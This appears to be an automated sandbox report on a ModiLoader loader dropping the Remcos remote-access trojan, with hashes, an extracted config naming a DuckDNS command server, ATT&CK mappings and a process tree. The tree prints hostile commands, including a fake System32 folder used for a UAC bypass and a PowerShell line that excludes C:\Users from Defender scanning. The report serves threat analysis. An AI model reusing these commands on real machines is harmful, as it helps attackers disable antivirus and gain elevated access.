Analysis

  • max time kernel
    148s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-04-2024 02:23

General

  • Target

    f00e32729c625a2fd9cba96a87180cc66b590af66515a361f086efbcff8d20ef.exe

  • Size

    1.7MB

  • MD5

    ee0513a80a58ed0fc91e30c06090b5d6

  • SHA1

    7ba8e3531bb8c68de5f9f1b1b86be7f2f5b33ccd

  • SHA256

    f00e32729c625a2fd9cba96a87180cc66b590af66515a361f086efbcff8d20ef

  • SHA512

    50f6d50f02350bf78bb2ed97ab3b5be2abd2ae3d95544228c8c5d004f41541505034cfb179f649f13532f20dd9997ffb49763298466c0ed7c6bad43e48cf081f

  • SSDEEP

    49152:7RBxLiIxxZrm0UZu0LCi2wcc/Z9n7DGxxZrmh7:dBxuIxu0UQ0LCccaZ9nPGxuh

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

127.0.0.1:47212

officerem.duckdns.org:47212

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-I8N3XG

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 18 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f00e32729c625a2fd9cba96a87180cc66b590af66515a361f086efbcff8d20ef.exe
    "C:\Users\Admin\AppData\Local\Temp\f00e32729c625a2fd9cba96a87180cc66b590af66515a361f086efbcff8d20ef.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1196
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\EjtitysqO.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4452
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
        3⤵
          PID:2772
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
          3⤵
          • Enumerates system info in registry
          PID:3404
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
          3⤵
            PID:2288
          • C:\Windows\SysWOW64\xcopy.exe
            xcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y
            3⤵
            • Enumerates system info in registry
            PID:4832
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
            3⤵
              PID:4448
            • C:\Windows\SysWOW64\xcopy.exe
              xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
              3⤵
              • Enumerates system info in registry
              PID:5008
            • C:\Windows \System32\easinvoker.exe
              "C:\Windows \System32\easinvoker.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:4764
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\windows \system32\aaa.bat""
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:996
                • C:\Windows\System32\extrac32.exe
                  C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
                  5⤵
                    PID:2464
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:3652
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                      6⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1132
            • C:\Windows\SysWOW64\extrac32.exe
              C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Local\Temp\f00e32729c625a2fd9cba96a87180cc66b590af66515a361f086efbcff8d20ef.exe C:\\Users\\Public\\Libraries\\Ejtitysq.PIF
              2⤵
                PID:1116

            Network

            MITRE ATT&CK Matrix ATT&CK v13

            Persistence

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Privilege Escalation

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Defense Evasion

            Modify Registry

            1
            T1112

            Discovery

            Query Registry

            1
            T1012

            System Information Discovery

            1
            T1082

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\remcos\logs.dat
              Filesize

              144B

              MD5

              1ff5651defb10e38aca7e0327c84007c

              SHA1

              8479b0f3ba4ca38426d8b79bc0cb39986e613677

              SHA256

              14b6493d55acfe16a5b8b2e96c3807ebeb6a21e5178ce33c0aefb2087fb75aa1

              SHA512

              4c2695b423888110632d5d5b22d67ef6442a2d6fe782f8b4219d5c13850692d65308286406cd78206e54342d0d9b246b1ed52ffcd474f09acf9f6a0746710ce8

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0hbqdq31.lch.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Public\Libraries\EjtitysqO.bat
              Filesize

              29KB

              MD5

              828ffbf60677999579dafe4bf3919c63

              SHA1

              a0d159a1b9a49e9eaccc53fe0c3266c0526a1bdc

              SHA256

              abac4a967800f5da708572ec42441ec373cd52459a83a8a382d6b8579482789d

              SHA512

              bf00909e24c5a6fb2346e8457a9adacd5f1b35988d90abbde9ff26896bbb59edafea60d9db4d10182a7b5e129bb69585d3e20bc5c63af3517b3a7ef1e45ffb7e

            • C:\Users\Public\Libraries\aaa.bat
              Filesize

              3KB

              MD5

              71e46efe9932b83b397b44052513fb49

              SHA1

              741af3b8c31095a0cc2c39c41e62279684913205

              SHA256

              11c20fabf677cd77e8a354b520f6ffca09cac37ce15c9932550e749e49efe08a

              SHA512

              76da3b441c0eaaaabdd4d21b0a3d4aa7fd49d73a5f0dab2cfb39f2e114efe4f4dabe2d46b01b66d810d6e0efa97676599ece5c213c1a69a5f2f4897a9b4ac8da

            • C:\Users\Public\Libraries\easinvoker.exe
              Filesize

              128KB

              MD5

              231ce1e1d7d98b44371ffff407d68b59

              SHA1

              25510d0f6353dbf0c9f72fc880de7585e34b28ff

              SHA256

              30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

              SHA512

              520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

            • C:\Users\Public\Libraries\netutils.dll
              Filesize

              114KB

              MD5

              566b326055c3ed8e2028aa1e2c1054d0

              SHA1

              c25fa6d6369c083526cafcf45b5f554635afe218

              SHA256

              a692d4305b95e57e2cfc871d53a41a5bfc9e306cb1a86ca1159db4f469598714

              SHA512

              da4b0b45d47757b69f9abc1817d3cb3c85deb08658e55f07b016fba053efe541a5791b9b2b380c25b440bbae6916c5a2245261553ca3c5025d9d55c943f9823c

            • C:\Users\Public\alpha.exe
              Filesize

              283KB

              MD5

              8a2122e8162dbef04694b9c3e0b6cdee

              SHA1

              f1efb0fddc156e4c61c5f78a54700e4e7984d55d

              SHA256

              b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

              SHA512

              99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

            • memory/1132-41-0x00007FFE58FE0000-0x00007FFE59AA1000-memory.dmp
              Filesize

              10.8MB

            • memory/1132-46-0x00007FFE58FE0000-0x00007FFE59AA1000-memory.dmp
              Filesize

              10.8MB

            • memory/1132-43-0x000001C499EC0000-0x000001C499ED0000-memory.dmp
              Filesize

              64KB

            • memory/1132-42-0x000001C499EC0000-0x000001C499ED0000-memory.dmp
              Filesize

              64KB

            • memory/1132-32-0x000001C4FFF30000-0x000001C4FFF52000-memory.dmp
              Filesize

              136KB

            • memory/1196-59-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-61-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-0-0x0000000000670000-0x0000000000671000-memory.dmp
              Filesize

              4KB

            • memory/1196-111-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-52-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-54-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-55-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-56-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-58-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-4-0x0000000000400000-0x00000000005B6000-memory.dmp
              Filesize

              1.7MB

            • memory/1196-60-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-2-0x0000000002A90000-0x0000000003A90000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-62-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-65-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-67-0x0000000000670000-0x0000000000671000-memory.dmp
              Filesize

              4KB

            • memory/1196-1-0x0000000002A90000-0x0000000003A90000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-77-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-78-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-88-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-89-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-99-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-100-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/1196-110-0x0000000015640000-0x0000000016640000-memory.dmp
              Filesize

              16.0MB

            • memory/4764-24-0x00000000613C0000-0x00000000613E3000-memory.dmp
              Filesize

              140KB